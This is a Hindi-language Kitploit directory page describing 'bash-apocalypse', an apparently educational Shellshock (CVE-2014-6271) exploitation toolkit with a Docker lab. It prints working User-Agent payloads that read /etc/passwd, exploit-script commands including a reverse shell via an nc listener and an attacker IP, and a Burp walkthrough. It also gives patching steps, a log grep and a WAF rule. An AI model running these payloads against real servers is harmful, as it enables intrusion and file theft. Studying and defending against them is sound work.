Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/mtaha-sec/bash-apocalypse
भेद्यता स्कैनरपेलोड जनरेशनशोषणआईडीएस/आईपीएस से बचनाशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलगलत कॉन्फ़िगरेशनलर्निंग और शिक्षालैब और अभ्यास
31 महीना पहलेअभी तक समीक्षित नहीं
GitHub
mtaha-sec/bash-apocalypse

bash-apocalypse

Recreating Shellshock (CVE-2014-6271) - the bash vulnerability that endangered millions of servers. Automated exploitation toolkit + Burp Suite methodology + Docker lab. Built for security research & education. Offensive security portfolio project.

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Bash Apocalypse

CVE-2014-6271 (Shellshock) के लिए स्वचालित शोषण टूलकिट

Severity CVSS Score

2014 में लाखों सर्वरों को प्रभावित करने वाली Shellshock कमजोरी को प्रदर्शित करने वाला एक पूर्ण सुरक्षा अनुसंधान परियोजना। इसमें स्वचालित स्कैनिंग, शोषण क्षमताएँ और रक्षात्मक सिफारिशें शामिल हैं।

Demo


Shellshock क्या है?

Shellshock (CVE-2014-6271) Bash शेल में एक गंभीर कमजोरी है जो पर्यावरण चर के माध्यम से दूरस्थ कोड निष्पादन की अनुमति देती है। 2014 में 22 वर्षों तक मौजूद रहने के बाद खोजा गया, इसने दुनिया भर में लाखों Unix/Linux सिस्टम को प्रभावित किया।

यह कैसे काम करता है:

root@kitploit:~
# सामान्य: Bash फ़ंक्शंस को पर्यावरण चर के रूप में निर्यात करता है
my_function='() { echo "hello"; }'

# बग: Bash फ़ंक्शन परिभाषा के बाद पार्सिंग जारी रखता है
exploit='() { :;}; echo "PWNED"'  # दूसरा कमांड निष्पादित होता है

CGI का उपयोग करने वाले वेब सर्वर HTTP हेडर को पर्यावरण चर के रूप में Bash में पास करते हैं, जिससे वे कमजोर हो जाते हैं:

root@kitploit:~
User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'

त्वरित आरंभ

root@kitploit:~
# क्लोन और सेटअप
git clone https://github.com/YOUR-USERNAME/bash-apocalypse.git
cd bash-apocalypse

# कमजोर लैब शुरू करें
docker-compose up -d

# एक्सप्लॉइट चलाएँ
chmod +x exploit.sh
./exploit.sh --url http://localhost:8080/cgi-bin/test.cgi --cmd "whoami"

विशेषताएँ

स्वचालित स्कैनर

  • कमजोर CGI एंडपॉइंट खोजता है
  • कई इंजेक्शन बिंदुओं का परीक्षण करता है (User-Agent, Referer, Cookie)
  • कस्टम वर्डलिस्ट सपोर्ट

शोषण उपकरण

  • आउटपुट कैप्चर के साथ कमांड निष्पादन
  • स्वचालित रिवर्स शेल
  • कई पेलोड विकल्प

लैब वातावरण

  • एक-कमांड Docker सेटअप
  • अलग-थलग कमजोर सर्वर
  • सुरक्षित परीक्षण वातावरण

उपयोग

कमजोरियों के लिए स्कैन करें

root@kitploit:~
./exploit.sh --scan --target localhost --port 8080

कमांड निष्पादित करें

root@kitploit:~
./exploit.sh --url http://target/cgi-bin/test.cgi --cmd "id"

रिवर्स शेल प्राप्त करें

root@kitploit:~
# टर्मिनल 1
nc -lvnp 4444

# टर्मिनल 2
./exploit.sh --url http://target/cgi-bin/test.cgi --reverse-shell YOUR_IP:4444

मैन्युअल शोषण (Burp Suite)

चरण 1: अनुरोध को इंटरसेप्ट करें

Burp Intercept

चरण 2: पेलोड इंजेक्ट करें

Exploitation

User-Agent हेडर को संशोधित करें:

root@kitploit:~
User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'

चरण 3: प्रतिक्रिया का निरीक्षण करें

Reverse Shell

सर्वर आपके कमांड को निष्पादित करता है और आउटपुट लौटाता है।


तकनीकी विश्लेषण

हमला प्रवाह

root@kitploit:~
क्लाइंट (हमलावर)
    │
    │ दुर्भावनापूर्ण User-Agent के साथ HTTP अनुरोध
    ▼
वेब सर्वर
    │
    │ हेडर को पर्यावरण चर के रूप में पास करता है
    ▼
CGI स्क्रिप्ट
    │
    │ Bash प्रक्रिया शुरू करता है
    ▼
Bash शेल
    │
    │ फ़ंक्शन को पार्स करता है + अनुगामी कमांड निष्पादित करता है
    ▼
कमांड निष्पादन (RCE)

मूल कारण

जब Bash एक पर्यावरण चर में फ़ंक्शन परिभाषा का सामना करता है:

  1. वह फ़ंक्शन को पार्स करता है: () { :;}
  2. बग: वह पार्सिंग जारी रखता है और बाद में कुछ भी निष्पादित करता है
  3. परिणाम: मनमाना कमांड निष्पादन

रक्षा

तत्काल शमन

root@kitploit:~
# Bash अपडेट करें
sudo apt-get update && sudo apt-get upgrade bash

# यदि आवश्यक न हो तो CGI अक्षम करें
sudo a2dismod cgi && sudo systemctl restart apache2

पता लगाना

root@kitploit:~
# शोषण प्रयासों के लिए लॉग जाँचें
grep -E "\\(\\)|\\{.*\\}" /var/log/apache2/access.log

WAF नियम

root@kitploit:~
SecRule REQUEST_HEADERS "\\(\\).*\\{" "deny,status:403,msg:'Shellshock Attack'"

प्रदर्शित कौशल

  • वेब एप्लीकेशन पेनिट्रेशन टेस्टिंग
  • Bash स्क्रिप्टिंग और ऑटोमेशन
  • HTTP प्रोटोकॉल हेरफेर
  • Docker कंटेनरीकरण
  • Burp Suite प्रवीणता
  • आक्रामक और रक्षात्मक दोनों सुरक्षा

परियोजना संरचना

root@kitploit:~
bash-apocalypse/
├── README.md
├── exploit.sh              # मुख्य उपकरण
├── payloads.txt            # परीक्षण पेलोड
├── docker-compose.yml      # लैब सेटअप
└── screenshots/
    ├── intercept.png
    ├── Payload.png
    └── result.png

कानूनी अस्वीकरण

केवल शैक्षिक उद्देश्यों के लिए। केवल उन सिस्टम का परीक्षण करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है। अनधिकृत पहुँच अवैध है।


संसाधन

  • CVE-2014-6271 विवरण
  • Cloudflare: Shellshock के अंदर
  • अभ्यास: HackTheBox - Shocker

यह समझने के लिए बनाया गया है कि कमजोरियाँ कैसे काम करती हैं और उनसे कैसे बचाव करें। ;)

टूल डाउनलोड करें